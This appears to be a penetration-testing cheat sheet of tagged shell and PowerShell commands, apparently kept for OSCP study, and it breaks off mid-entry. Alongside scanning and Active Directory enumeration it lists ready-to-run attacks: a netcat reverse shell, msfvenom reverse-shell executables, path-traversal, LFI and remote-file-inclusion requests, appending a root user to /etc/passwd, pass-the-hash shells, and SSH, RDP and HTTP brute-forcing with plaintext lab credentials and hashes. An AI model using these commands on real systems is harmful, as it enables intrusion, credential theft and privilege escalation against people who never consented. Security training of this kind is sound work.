title: Commands for Fast Memo Shell commands: - cmd: nmap -p- --min-rate 10000 192.168.56.30 -Pn lang: sh tags: OSCP desc: Fast scan all ports - cmd: nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,5986,9389,49668,49670,49671,49673,49674,49687,49750 -sCV 192.168.56.30 -Pn lang: sh tags: OSCP desc: Scan with services and versions - cmd: sudo nmap -v -p- -sS -sV -A -T5 192.168.1.1 lang: sh tags: OSCP desc: Syn TCP scan all ports with fingerprint, with fastest timming and verbose output - cmd: grc nmap -v -p- -sV -A --min-rate 10000 --max-rtt-timeout 1500ms 192.168.229.201 lang: sh tags: OSCP desc: TCP scan all ports with fingerprint fast with colors - cmd: sudo nmap -sU -sV -A 192.168.203.199 lang: sh tags: OSCP desc: UDP scan - cmd: nmap -O -sV -A 192.168.203.199 lang: sh tags: OSCP desc: TCP scan with OS fingerprint - cmd: nmap -p- -sV -A --script "vuln" 192.168.213.188 lang: sh tags: OSCP desc: TCP scan all ports and check for vuln - cmd: nmap -sV -p 80,443 --script "vuln" 192.168.50.124 lang: sh tags: OSCP desc: TCP scan HTTP/S and check for vuln - cmd: nmap -p80,443 --script http-title 192.168.218.0/24 --open -Pn lang: sh tags: OSCP desc: TCP scan HTTP/S and get page titles - cmd: nmap -sT -A --top-ports=20 192.168.50.1-253 -oG top-port-sweep.txt lang: sh tags: OSCP desc: TCP connect scan for the top 20 TCP ports - cmd: nmap --script http-headers 192.168.50.6 lang: sh tags: OSCP desc: scan and check headers with NSE scripts - cmd: nmap --script-help http-headers lang: sh tags: OSCP desc: get help about a NSE script - cmd: rustscan --ulimit 5000 -a 10.129.102.178 -- -sV lang: sh tags: OSCP desc: fast scan top ports with nmap service version - cmd: rustscan --ulimit 5000 -a 10.129.102.178 -- -A -sC -sV lang: sh tags: OSCP desc: fast scan top ports with nmap scripts - cmd: rustscan --ulimit 5000 -a 10.129.102.178 lang: sh tags: OSCP desc: fast scan top ports - cmd: rustscan --ulimit 5000 -r 1-65535 -a 10.129.102.178 lang: sh tags: OSCP desc: fast scan all ports - cmd: naabu -host 192.168.214.149 lang: sh tags: OSCP desc: fast scan a host - cmd: naabu -nmap-cli 'nmap -sV' -host 192.168.214.149 lang: sh tags: OSCP desc: fast scan a host and nmap service discovery - cmd: naabu -nmap-cli 'nmap -sV -sC' -host 192.168.214.149 lang: sh tags: OSCP desc: fast scan a host and nmap service discovery and scripts - cmd: naabu -nmap-cli 'nmap -sV -sC' -port 1-65535 -host 192.168.214.149 lang: sh tags: OSCP desc: fast scan a host of all ports - cmd: naabu -nmap-cli 'nmap -sV -sC' -l ip_lists lang: sh tags: OSCP desc: fast scan a list of hosts - cmd: naabu -proxy 127.0.0.1:1080 -Pn -host 10.10.104.146 lang: sh tags: OSCP desc: scan using proxy socks - cmd: Invoke-WebRequest -Proxy "http://192.168.197.224:3128" -uri http://192.168.197.224:8000 -outfile test lang: ps1 tags: OSCP desc: using proxy on windows - cmd: find /usr/share/nmap/scripts/ -type f | sk --preview 'bat -l lua --color=always {}' lang: sh tags: OSCP desc: search a NSE script - cmd: nc -nvv -w 1 -z 192.168.50.152 3388-3390 lang: sh tags: OSCP desc: TCP scan without nmap - cmd: nc -nv -u -z -w 1 192.168.50.149 120-123 lang: sh tags: OSCP desc: UDP scan without nmap - cmd: nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152 lang: sh tags: OSCP desc: SMB scan with info - cmd: nmap -p 445 --script smb-os-discovery 192.168.212.0/24 --open -oG a; cat a | grep open | cut -d ' ' -f2 | tail -n +2 | xargs -I{} enum4linux {} lang: sh tags: OSCP desc: SMB scan with info ip range - cmd: sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt lang: sh tags: OSCP desc: UDP scan ip range - cmd: gobuster dir -u http:/// -w /usr/share/wordlists/dirb/common.txt -t 5 lang: sh tags: OSCP desc: enumerate pages on webserver - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://192.168.232.221/ -f lang: sh tags: OSCP desc: bruteforce directory on webserver - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -u http://192.168.232.221/ -x txt,html,php,asp,aspx,jsp lang: sh tags: OSCP desc: bruteforce files on webserver - cmd: feroxbuster --url http:/// lang: sh tags: OSCP desc: enumerate pages on webserver - cmd: feroxbuster --url http:/// -x pdf,php,txt lang: sh tags: OSCP desc: enumerate pages on webserver (check for pdf, php, txt files) - cmd: feroxbuster --url http://192.168.222.46 -w /usr/share/wordlists/dirb/common.txt lang: sh tags: OSCP desc: enumerate pages on webserver using common list - cmd: feroxbuster --url http://192.168.193.46/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt lang: sh tags: OSCP desc: enumerate pages on webserver using very big list - cmd: ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.240.46/FUZZ lang: sh tags: OSCP desc: enumerate pages on webserver - cmd: ffuf -w pins -u "http://10.129.95.191/cdn-cgi/login/admin.php?content=uploads" -b "user=FUZZ2; role=guest" -mc 200 lang: sh tags: OSCP desc: Fuzz cookie value (bruteforce) - cmd: gobuster vhost -u http:// -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt lang: sh tags: OSCP desc: discover vhost (virtual host) - cmd: wfuzz -c -f sub-fighter -u '' -H 'Host:FUZZ.' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt lang: sh tags: OSCP desc: discover vhost (virtual host) - cmd: wfuzz -c -f sub-fighter -u '' -H 'Host:FUZZ.' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hw lang: sh tags: OSCP desc: discover vhost (virtual host), get rid of non-existent false positives - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -u http://192.168.1.10:8000/ [-f] lang: sh tags: OSCP desc: discover directories - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://192.168.1.10:8000/architecture/ lang: sh tags: OSCP desc: discover commons files - cmd: gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -u http://192.168.1.10:8000/architecture/ -x txt,html,php,asp,aspx,jsp lang: sh tags: OSCP desc: discover files using extensions - cmd: ~/hs/tools/enum4linux-ng.py 192.168.194.10 lang: sh tags: OSCP desc: SMB enumeration - cmd: rpcclient -U "MINILAB\\" 192.168.56.30 -N lang: sh tags: OSCP desc: RPC enumeration (enumdomusers, enumdomgroups) - cmd: net rpc group members 'Domain Users' -W 'MINILAB' -I '192.168.56.30' -U '%' lang: sh tags: OSCP desc: Get all domain users - cmd: nmap -Pn -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='minilab',userdb=/usr/share/seclists/Usernames/Names/names.txt" 192.168.56.30 lang: sh tags: OSCP desc: Get all domain users, when anonymous sessions are not allowed - cmd: smbmap -H 192.168.229.210 lang: sh tags: OSCP desc: SMB list all shares with available permissions - cmd: netexec smb 192.168.56.30 lang: sh tags: OSCP desc: check SMB access - cmd: netexec smb 192.168.56.30 -u bob -p 'superman' lang: sh tags: OSCP desc: check SMB access with creds - cmd: netexec smb 192.168.56.30 -u bob -p 'superman' --shares lang: sh tags: OSCP desc: check SMB shares with creds - cmd: netexec smb 192.168.56.30 -u bob -p 'superman' -M spider_plus lang: sh tags: OSCP desc: check SMB shares with creds and try to find interesting files - cmd: crackmapexec smb 192.168.56.30 -u 'a' -p '' --shares lang: sh tags: OSCP desc: list guest access on shares - cmd: smbclient --no-pass -L //192.168.194.10 lang: sh tags: OSCP desc: list unprotected SMB shares - cmd: smbclient --no-pass //192.168.194.10/offsec lang: sh tags: OSCP desc: list under unprotected SMB share - cmd: smbclient //192.168.50.195/share -c 'put config.Library-ms' lang: sh tags: oscp desc: Uploading our Library file to the SMB share on the HR137 machine - cmd: smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b lang: sh tags: OSCP desc: Using smbclient with NTLM hash - cmd: smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b ; dir ; get secrets.txt lang: ps1 tags: oscp desc: Using smbclient with NTLM hash - cmd: smbmap -u WEB02\mark -p OathDeeplyReprieve91 -H 192.168.246.248 lang: sh tags: OSCP desc: SMB list all shares with available permissions - cmd: impacket-smbclient WEB02\mark@192.168.246.248 [-hashes LMHASH:NTHASH] lang: sh tags: OSCP desc: connect to smb share - cmd: smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234 lang: sh tags: oscp desc: Listing SMB shares through the SSH local port forward running on CONFLUENCE01. - cmd: smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234 ; ls ; get Provisioning.ps1 lang: sh tags: oscp desc: Listing files in the scripts share, using smbclient over our SSH local port forward running on CONFLUENCE01. - cmd: proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234 lang: sh tags: oscp desc: smbclient connecting to HRSHARES through the SOCKS proxy using Proxychains. - cmd: smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234 lang: sh tags: oscp desc: Connecting to the SMB share on HRSHARES, without any explicit forwarding. - cmd: smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234 lang: sh tags: oscp desc: Connecting to HRSHARES's SMB server through the dnscat2 port forward. - cmd: sudo mount -t cifs //192.168.194.10/offsec /mnt/smb lang: sh tags: OSCP desc: mount a SMB share - cmd: sudo mount -t cifs //192.168.1.1/USB1 /mnt/livebox/ -o username=guest,password="",vers=1.0 lang: sh tags: OSCP desc: mount a SMB share (guest) - cmd: snmp-check 192.168.212.151 lang: sh tags: OSCP desc: SNMP enumeration - cmd: snmpwalk -Oa -c public -v1 -t 10 192.168.212.151 lang: sh tags: OSCP desc: SNMP enumeration - cmd: echo -e "public\nprivate\nmanager" > community lang: sh tags: OSCP desc: SNMP enumeration generate community file - cmd: for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips lang: sh tags: OSCP desc: SNMP enumeration generate ip list file - cmd: onesixtyone -c community -i ips lang: sh tags: OSCP desc: SNMP enumeration - cmd: snmpwalk -c public -v1 -t 10 192.168.50.151 lang: sh tags: OSCP desc: SNMP enumeration - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25 lang: sh tags: OSCP desc: SNMP enumeration list entire MIB tree - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2 lang: sh tags: OSCP desc: SNMP enumeration list all the currently running processes - cmd: snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3 lang: sh tags: OSCP desc: SNMP enumeration list all the current TCP listening ports - cmd: snmpwalk -c public -v1 -t 10 192.168.244.149 NET-SNMP-EXTEND-MIB::nsExtendObjects lang: sh tags: OSCP desc: SNMP enumeration of Extending Services - cmd: apt-get install snmp-mibs-downloader; download-mibs lang: sh tags: OSCP desc: update some MIBs to the latest version or to download extra vendor MIBs. - cmd: impacket-mssqlclient -port 1433 -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.129.129.69 lang: sh tags: OSCP desc: connect to a MSSQL Server - cmd: curl "http://192.168.50.16/cgi-bin/../../../../etc/passwd" lang: sh tags: OSCP desc: check Directory Traversals - cmd: curl "http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" lang: sh tags: OSCP desc: check Directory Traversals - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd" lang: sh tags: OSCP desc: check Directory Traversals - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log" lang: sh tags: OSCP desc: check Local File Inclusion - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php" lang: sh tags: OSCP desc: check Local File Inclusion with PHP Wrappers - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php" lang: sh tags: OSCP desc: check Local File Inclusion with PHP Wrappers - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain," lang: sh tags: OSCP desc: check Local File Inclusion with PHP Wrappers - cmd: curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls" lang: sh tags: OSCP desc: check Remote File Inclusion - cmd: remmina -c rdp://username@server lang: sh tags: OSCP desc: connect to a remote desktop in RDP - cmd: nc -nvlp 4444 lang: sh tags: OSCP reverse-shell desc: Bind netcat for reverse shell - cmd: rlwrap -cAr nc -lnvp 443 lang: sh tags: OSCP desc: Bind netcat for reverse shell with completion - cmd: source ~/.virtualenvs/wsgidav/bin/activate lang: sh tags: COMMON desc: use a python venv - cmd: ~/hs/tools/powershell_base64_enc.sh lang: sh tags: OSCP desc: encode a powershel payload in base64 - cmd: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.157 4444 >/tmp/f lang: sh tags: OSCP reverse-shell desc: bash reverse shell payload - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.165 LPORT=4445 -f exe-service > a.exe lang: sh tags: OSCP reverse-shell desc: generate a windows service executable reverse shell - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.165 LPORT=4445 -f exe > a.exe lang: sh tags: OSCP reverse-shell desc: generate a windows executable reverse shell - cmd: msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.45.204;set LPORT 443;run;" lang: sh tags: OSCP reverse-shell desc: launch a meterpreter listener - cmd: curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive lang: sh tags: OSCP desc: Command injection POST command as data - cmd: curl -s https://http.kali.org/README.mirrorlist | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep 'README$' | sort | uniq | xargs dirname | xargs -I {} sh -c 'echo $(curl -r 0-102400 -s -w %{speed_download} -o /dev/null {}/dists/kali-rolling/Contents-amd64.gz) {}' | sort -g -r lang: sh tags: OSCP desc: List kali mirrors and speed sorted - cmd: exiftool -a -u old.pdf lang: sh tags: OSCP desc: Print all metadata from a file - cmd: mysql -u root -p'root' -h 192.168.50.16 -P 3306 lang: sh tags: COMMON desc: connect to mysql - cmd: chezmoi git pull -- --autostash --rebase && chezmoi diff lang: sh tags: COMMON desc: Pull the latest changes from your repo and see what would change, without actually applying the changes - cmd: sudo setcap 'cap_net_bind_service=+ep' /usr/bin/python3.11 lang: sh tags: COMMON desc: Allow bind for port < 1024, set capability CAP_NET_BIND_SERVICE - cmd: /usr/bin/impacket-smbserver -smb2support share `pwd` lang: sh tags: OSCP CUSTOM desc: 'share directory using SMB protocol, client cmd: net use z: \\ip\share' - cmd: responder -I tap0 lang: sh tags: OSCP desc: launch responder on interface tap0 - cmd: sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" lang: sh tags: OSCP desc: use post.txt request file, "item" vulnerable item, with a custom writable dir - cmd: sqlmap --flush-sessiony lang: sh tags: OSCP desc: remove the previous session - cmd: sudo grc tcpdump -l -n -i tun0 "dst net 192.168.45.152 && ((tcp[tcpflags] & (tcp-syn) != 0) || not tcp )" lang: sh tags: OSCP desc: dump connection to current host (troubleshooting reverse shell) - cmd: sudo grc tcpdump -X -vvv -l -n -i tun0 "dst net 192.168.45.152 && ((tcp[tcpflags] & (tcp-syn) != 0) || not tcp )" lang: sh tags: OSCP desc: dump connection to current host with details (troubleshooting reverse shell) - cmd: msfdb init lang: sh tags: OSCP desc: init metasploit database - cmd: hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force lang: sh tags: OSCP desc: crack password using rules - cmd: john --wordlist=ssh.passwords --rules=sshRules ssh.hash lang: sh tags: OSCP desc: bruteForce Hash with John - cmd: john --wordlist=/usr/share/wordlists/rockyou.txt --rules=sshRules -stdout > passwords.txt lang: sh tags: OSCP desc: generate wordlist - cmd: hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force lang: sh tags: OSCP desc: bruteForce NTLM hash - cmd: hashcat --help | grep -i "ntlm" lang: sh tags: OSCP desc: search for hashcat hash code - cmd: hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force lang: sh tags: OSCP desc: bruteForce Net-NTLMv2 hash - cmd: hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 lang: sh tags: OSCP desc: bruteforce SSH - cmd: hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" lang: sh tags: OSCP desc: bruteforce RDP - cmd: hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.221.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Invalid username or password" lang: sh tags: OSCP desc: bruteforce HTTP post - cmd: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.221.201 http-get / lang: sh tags: OSCP desc: bruteforce HTTP auth basic - cmd: legba ssh -T 192.168.195.153 -U usernames.txt -P passwords.txt lang: sh tags: OSCP desc: bruteforce SSH - cmd: legba rdp -T 192.168.244.191 -U users -P passwords lang: sh tags: OSCP desc: bruteforce RDP - cmd: nslookup mail.megacorptwo.com lang: ps1 tags: OSCP windows desc: request DNS - cmd: nslookup -type=TXT info.megacorptwo.com 192.168.50.151 lang: sh tags: OSCP desc: request DNS sepecific type and resolver - cmd: gobuster dir -u http://192.168.238.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern lang: sh tags: OSCP desc: Enumerate API (pattern contain "v1 \n v2") - cmd: echo 'MS01.oscp.exam' | gobuster vhost -w - -u http://192.168.194.147:8080 lang: sh tags: OSCP desc: Check if vhost exist - cmd: curl -A '' -H 'Host:' http:// lang: sh tags: OSCP desc: Check if vhost exist - cmd: find / -user root -perm -002 -type f -not -path "/proc/*" 2>/dev/null lang: sh tags: OSCP desc: find root writables files - cmd: routel lang: sh tags: OSCP desc: list all routes - cmd: ss -anp lang: sh tags: OSCP desc: list all sockets - cmd: ls -lah /etc/cron* lang: sh tags: OSCP desc: list cron files - cmd: find / -perm -u=s -type f 2>/dev/null lang: sh tags: OSCP desc: find suid files - cmd: grep "CRON" /var/log/syslog lang: sh tags: OSCP desc: get cron logs - cmd: echo "root2:$(openssl passwd w00t):0:0:root:/root:/bin/bash" >> /etc/passwd lang: sh tags: OSCP desc: add a user root2 with password w00t - cmd: /usr/sbin/getcap -r / 2>/dev/null lang: sh tags: OSCP desc: recursive search / for binaries with capabilities. - cmd: whatweb http://192.168.203.48/ lang: sh tags: OSCP desc: check server and framework used by a website - cmd: searchsploit "HTML Injection exploit WebCT" lang: sh tags: OSCP desc: search a exploit - cmd: searchsploit -m lang: sh tags: OSCP desc: download a exploit - cmd: impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b lang: sh tags: OSCP desc: Using psexec to get an interactive shell - cmd: impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b lang: sh tags: OSCP desc: Using wmiexec to get an interactive shell - cmd: xfreerdp /u:stephanie /d:corp.com /p:'LegmanTeamBenzoin!!' /cert-ignore /v:192.168.197.75 +clipboard /dynamic-resolution /drive:~/vmshare,vmshare lang: sh tags: OSCP desc: connect to rdp - cmd: xfreerdp /u:offsec /p:'lab' /cert-ignore /v:192.168.197.75 +clipboard /dynamic-resolution lang: sh tags: OSCP desc: connect to rdp - cmd: swaks --from administrator@supermagicorg.com --to dave.wizard@supermagicorg.com --server 192.168.194.199:587 --auth-user test@supermagicorg.com --auth-pass test --body @msg.txt --attach @config.Library-ms lang: sh tags: OSCP desc: send a email - cmd: wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/oscp/webdav/ lang: sh tags: OSCP desc: launch webdav server - cmd: socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432 lang: sh tags: OSCP desc: redirect a port and debug - cmd: socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22 lang: sh tags: OSCP desc: redirect a port - cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' lang: sh tags: OSCP desc: enable console ssh interaction in netcat shell - cmd: plink.exe -ssh -l kali -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4 lang: ps1 tags: OSCP Windows desc: port redirect using plink - cmd: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.232.64 connectport=22 connectaddress=10.4.232.215 lang: ps1 tags: OSCP desc: add port redirect using netsh - cmd: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.232.64 localport=2222 action=allow lang: sh tags: OSCP desc: add firewall rule using netsh - cmd: netsh advfirewall firewall delete rule name="port_forward_ssh_2222" lang: sh tags: OSCP desc: delete firewall rule using netsh - cmd: netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.232.64 lang: sh tags: OSCP desc: delete port redirect using netsh - cmd: 'alias issh=ssh -o LogLevel=ERROR -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no"' lang: sh tags: OSCP desc: SSH without fingerprint - cmd: powershell -ep bypass lang: ps1 tags: OSCP Windows winsetup desc: bypass the execution policy - cmd: icacls lang: ps1 tags: OSCP Windows desc: discretionary access control lists (DACLs) on specified files - cmd: whoami lang: ps1 tags: OSCP Windows desc: obtain username and hostname - cmd: whoami /groups lang: ps1 tags: OSCP Windows desc: Group memberships of the user - cmd: Get-LocalUser lang: ps1 tags: OSCP Windows desc: Display local users (depuis powershell) - cmd: Get-LocalGroup lang: ps1 tags: OSCP Windows desc: Display local groups (depuis powershell) - cmd: Get-LocalGroupMember adminteam lang: ps1 tags: OSCP Windows desc: Display members of the group - cmd: systeminfo lang: ps1 tags: OSCP Windows desc: Information about the operating system and architecture - cmd: ipconfig /all lang: ps1 tags: OSCP Windows desc: Information about the network configuration - cmd: netstat -ano lang: ps1 tags: OSCP Windows desc: Active network connections - cmd: Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname lang: ps1 tags: OSCP Windows desc: Installed applications - cmd: Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname lang: ps1 tags: OSCP desc: Installed applications - cmd: Get-Process lang: ps1 tags: OSCP desc: Running processes - cmd: Get-Process | Select-Object -ExpandProperty Path lang: ps1 tags: OSCP desc: Running processes with path - cmd: Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue lang: ps1 tags: OSCP desc: Find in powershell - cmd: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue lang: ps1 tags: OSCP desc: Find in powershell - cmd: dir -Recurse | Select-String -pattern "steve" lang: ps1 tags: OSCP desc: recusrive grep - cmd: net user steve lang: ps1 tags: OSCP desc: Get info about account - cmd: Get-History lang: ps1 tags: OSCP desc: Get powershell history commands - cmd: Clear-History lang: ps1 tags: OSCP desc: Clear powershell history commands - cmd: (Get-PSReadlineOption).HistorySavePath lang: ps1 tags: OSCP desc: Display path of the history file from PSReadline (then type to read) - cmd: eventvwr lang: ps1 tags: OSCP desc: Launch event viewer - cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} lang: ps1 tags: OSCP desc: List of services with binary path - cmd: Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'} lang: ps1 tags: OSCP desc: Obtain Startup Type for mysql service - cmd: whoami /priv lang: ps1 tags: OSCP desc: Checking for reboot privileges - cmd: shutdown /r /t 0 lang: ps1 tags: OSCP desc: Reboot - cmd: Restart-Service BetaService lang: ps1 tags: OSCP desc: Restarting BetaService - cmd: $env:path lang: ps1 tags: OSCP desc: Display the PATH environment variable - cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName lang: ps1 tags: OSCP desc: List of services with binary path - cmd: wmic service get name,pathname | findstr .. (look in courses) lang: ps1 tags: OSCP desc: List of services with spaces and missing quotes in the binary path - cmd: schtasks /query /fo LIST /v lang: ps1 tags: OSCP desc: list scheduled tasks - cmd: vim --clean lang: sh tags: COMMON desc: launch vim without options and config files - cmd: git --git-dir=~/fms/.git --work-tree=~/fms pull lang: sh tags: COMMON desc: git command (pull) with directory as params - cmd: pandoc -f epub -t markdown_strict -o hacktricks.md hacktricks.epub lang: sh tags: COMMON desc: convert files from format to another, here epub to markdown - cmd: grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" lang: sh tags: COMMON desc: grep ip address - cmd: grep -E -o "[[:alnum:]]{30,34}" lang: sh tags: COMMON desc: grep NTLM hash - cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 lang: sh tags: COMMON desc: launch mitmproxy with options - cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 -s ~/hs/mitmproxy/req_hook.py lang: sh tags: COMMON desc: launch mitmproxy with options and hook - cmd: mitmproxy --set console_mouse=false --set anticache -p 8080 --mode upstream:http://127.0.0.1:8888 lang: sh tags: COMMON desc: launch mitmproxy with upstream proxy - cmd: find / -xdev -type f \( -exec grep -xq "{}" /var/lib/dpkg/info/*.list \; -or -print \) lang: sh tags: COMMON desc: search for files not owned by any package - cmd: secret-tool search key password lang: sh tags: COMMON desc: search password saved in gnome keyring - cmd: Set-WinUserLanguageList -Force 'fr-FR' lang: ps1 tags: COMMON powershell winsetup desc: change Keyboard Layout in French - cmd: Test-NetConnection -Port 445 192.168.50.151 lang: ps1 tags: OSCP powershell desc: Check for TCP port open - cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null lang: ps1 tags: OSCP powershell desc: TCP scan port - cmd: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).ConnectAsync("192.168.50.151", $_).Wait(100)) "TCP port $_ is open"} 2>$null lang: ps1 tags: OSCP powershell desc: TCP scan port display only open - cmd: '(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell' lang: ps1 tags: OSCP powershell windows cmd.exe desc: check the current shell - cmd: powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe lang: ps1 tags: OSCP powershell windows cmd.exe desc: download a file - cmd: net view \\dc01 /all lang: ps1 tags: OSCP windows cmd.exe desc: Show SMB share - cmd: ls -l /usr/share/metasploit-framework/scripts/resource lang: sh tags: OSCP desc: list Meterpreter autoscript examples - cmd: net user jeffadmin /domain lang: ps1 tags: OSCP powershell windows cmd.exe desc: get information about a user and domain - cmd: net group /domain lang: ps1 tags: OSCP powershell windows cmd.exe desc: output includes a long list of groups in the domain - cmd: net group "sales department" /domain lang: ps1 tags: oscp powershell windows cmd.exe desc: enumerate the group members - cmd: cd c:\Tools lang: ps1 tags: oscp powershell windows winsetup desc: go to tools directory - cmd: Import-Module .\PowerView.ps1 lang: ps1 tags: oscp powershell windows winsetup desc: import the module PowerView - cmd: Import-Module .\Sharphound.ps1 lang: ps1 tags: oscp powershell windows winsetup desc: import the module SharpHound - cmd: Get-NetDomain lang: ps1 tags: oscp powershell windows PowerView desc: get basic information about the domain - cmd: Get-NetUser lang: ps1 tags: oscp powershell windows PowerView desc: get a list of all users in the domain - cmd: Get-NetUser | select cn,pwdlastset,lastlogon lang: ps1 tags: oscp powershell windows PowerView desc: get a list of all users in the domain and pipe output to select only attributes - cmd: Get-NetGroup | select cn lang: ps1 tags: oscp powershell windows PowerView desc: enumerate groups and pipe output to select only attributes - cmd: Get-NetGroup "Sales Department" | select member lang: ps1 tags: oscp powershell windows PowerView desc: investigate the Sales Department using Get-NetGroup and pipe the output into select member - cmd: Get-NetComputer lang: ps1 tags: oscp powershell windows PowerView desc: enumerate the computer objects in the domain - cmd: Get-NetComputer | select operatingsystem,dnshostname lang: ps1 tags: oscp powershell windows PowerView desc: enumerate the computer objects in the domain and list operating system and hostnames - cmd: Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion lang: ps1 tags: oscp powershell windows PowerView desc: enumerate the computer objects with OS version - cmd: Find-LocalAdminAccess lang: ps1 tags: oscp powershell windows PowerView desc: Scanning domain to find local administrative privileges for our user - cmd: Get-NetSession -ComputerName files04 -Verbose lang: ps1 tags: oscp powershell windows PowerView desc: Checking logged on users - cmd: Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl lang: ps1 tags: oscp powershell windows desc: Displaying permissions on the DefaultSecurity registry hive - cmd: .\PsLoggedon.exe \\files04 lang: ps1 tags: oscp powershell windows desc: PsLoggedOn to see user logons at Files04 - cmd: setspn -L iis_service lang: ps1 tags: oscp powershell windows desc: Listing SPN linked to a certain user account - cmd: Get-NetUser -SPN | select samaccountname,serviceprincipalname lang: ps1 tags: oscp powershell windows desc: Listing the SPN accounts in the domain - cmd: nslookup.exe web04.corp.com lang: ps1 tags: oscp powershell windows desc: Resolving the web04.corp.com name - cmd: Get-ObjectAcl -Identity stephanie lang: ps1 tags: oscp powershell windows PowerView desc: Running Get-ObjectAcl specifying our user - cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104 lang: ps1 tags: oscp powershell windows PowerView desc: Converting the ObjectISD into name - cmd: 'Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights' lang: ps1 tags: oscp powershell windows PowerView desc: Enumerating ACLs for the Management Group - cmd: '"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104" | 